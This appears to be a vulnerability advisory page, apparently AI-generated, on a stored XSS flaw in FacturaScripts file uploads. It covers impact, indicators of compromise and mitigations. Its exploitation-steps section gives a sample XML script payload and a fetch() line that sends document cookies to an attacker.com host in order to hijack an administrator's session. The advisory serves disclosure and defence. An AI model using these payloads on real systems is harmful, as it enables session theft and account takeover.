CVE-2025-69210: 
PHP vulnerability analysis and mitigation

Overview

CVE-2025-69210 is a stored cross-site scripting (XSS) vulnerability in FacturaScripts, an open-source ERP and accounting software, affecting all versions prior to 2025.7. The flaw resides in the product file upload functionality, where authenticated users can upload crafted XML files containing executable JavaScript that is later rendered without sufficient sanitization or content-type enforcement. It was published and patched on December 30, 2025. The CVSS v3.1 base score is 5.4 (Medium), while the GitHub Advisory Database assigns a CVSS v4 overall score of 8.6 (High) (GitHub Advisory, NeoRazorX Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting) and stems from insufficient input validation and a lack of content-type enforcement when serving uploaded product files (GitHub Advisory). An authenticated attacker with low privileges can upload a crafted XML file embedding malicious JavaScript payloads into the product file upload feature; when the file is subsequently accessed or rendered by the application, the JavaScript executes in the viewer's browser context. Because product files uploaded by regular users are accessible to administrative users, the attack chain specifically enables privilege escalation via session hijacking — a low-privileged user can target administrator sessions without any additional preconditions beyond having a valid account (NeoRazorX Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser session of any user — including administrators — who accesses the malicious uploaded file. This can result in session token theft, account takeover of privileged users, unauthorized actions performed on behalf of the administrator (such as creating accounts or modifying financial records), and potential further compromise of the ERP system. Confidentiality and integrity of data managed within FacturaScripts are both at risk, though availability is not directly impacted (GitHub Advisory, NeoRazorX Advisory).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.061%, indicating a low near-term probability of exploitation. Exploitation requires an authenticated attacker (low privilege) and passive user interaction from an administrator, limiting opportunistic mass exploitation but making it relevant in targeted insider-threat or supply-chain scenarios.

Exploitation steps

  1. Obtain low-privileged access: Register or obtain credentials for a regular (non-admin) user account on a FacturaScripts instance running a version prior to 2025.7.
  2. Craft a malicious XML file: Create an XML file that embeds executable JavaScript, for example: <?xml version="1.0"?><root><script xmlns="http://www.w3.org/1999/xhtml">alert(document.cookie)</script></root> or a more sophisticated payload designed to exfiltrate session cookies to an attacker-controlled server.
  3. Upload the file: Navigate to the product file upload functionality within FacturaScripts and upload the crafted XML file as a product attachment.
  4. Wait for administrator access: The uploaded file becomes visible to administrative users. When an administrator browses or opens the uploaded product file, the application renders it without sanitization, triggering JavaScript execution in the admin's browser.
  5. Harvest session data: The malicious script executes in the administrator's browser context, potentially sending session cookies or tokens to an attacker-controlled endpoint (e.g., via fetch('https://attacker.com/?c='+document.cookie)).
  6. Escalate privileges: Use the captured administrator session token to authenticate as the administrator and perform privileged actions within the FacturaScripts application (NeoRazorX Advisory, GitHub Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from an administrator's browser to unexpected external domains shortly after accessing product file listings; requests containing URL-encoded cookie or session data in query parameters.
  • File System: Presence of XML files in the FacturaScripts product file upload directory containing <script> tags, JavaScript event handlers, or encoded JavaScript payloads.
  • Logs: Application or web server access logs showing requests to product file endpoints (e.g., file download/view URLs) followed by unusual outbound connections; logs showing XML file uploads by low-privileged users.
  • Browser/Session: Unexpected administrative actions (new user creation, configuration changes, data exports) occurring in administrator sessions without corresponding administrator-initiated activity.

Mitigation and workarounds

The vendor has released FacturaScripts version 2025.7, which fixes this vulnerability; upgrading is the primary recommended remediation (NeoRazorX Advisory, v2025.7 Release). As interim mitigations, administrators should implement strict server-side validation and sanitization of all uploaded file content, enforce correct Content-Type response headers (e.g., application/octet-stream or text/plain) when serving uploaded files to prevent browser rendering, and restrict file upload permissions to trusted users only. Additionally, deploying a Content Security Policy (CSP) header can reduce the impact of any XSS execution.

Community reactions

The vulnerability was credited to researcher vettrivel007 in the GitHub Security Advisory (NeoRazorX Advisory). The disclosure received routine coverage from vulnerability aggregators including Vulners, VulDB, CIRCL Vulnerability Lookup, and INCIBE-CERT, with no notable broader media coverage or significant community debate observed (INCIBE-CERT).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management